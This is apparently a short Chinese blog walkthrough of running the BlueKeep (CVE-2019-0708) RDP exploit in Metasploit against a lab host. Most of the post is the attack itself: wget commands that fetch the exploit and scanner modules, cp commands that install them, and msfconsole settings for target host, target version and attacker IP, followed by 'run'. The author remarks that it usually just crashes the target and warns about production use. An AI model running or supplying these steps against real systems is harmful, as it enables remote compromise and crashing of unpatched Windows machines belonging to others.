- 这个漏洞出来一段时间了,网上也有利用脚本,听说成功率极低,一般直接打蓝屏,今天闲来无事我也来碰碰运气。
- 网上下载脚本并拷贝到利用模块中 (没有rdp文件夹的需要自己先创建该文件夹)
#4个文件
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
#拷贝到目录
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
- 重新打开msfconsole
#重新加载
reload_all
search 0708
1.jpg
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
info #查看需要设置的参数
set RHOSTS 192.168.3.183 #目标机器
set target 3 # 机器本版
set RDP_CLIENT_IP 192.168.3.157 #kali
run
2.jpg
-
接下来就是漫长的等待。。。。
3.jpg
- 我丢雷楼母
4.jpg
!最后说一句,生产环境请慎重测试
网友评论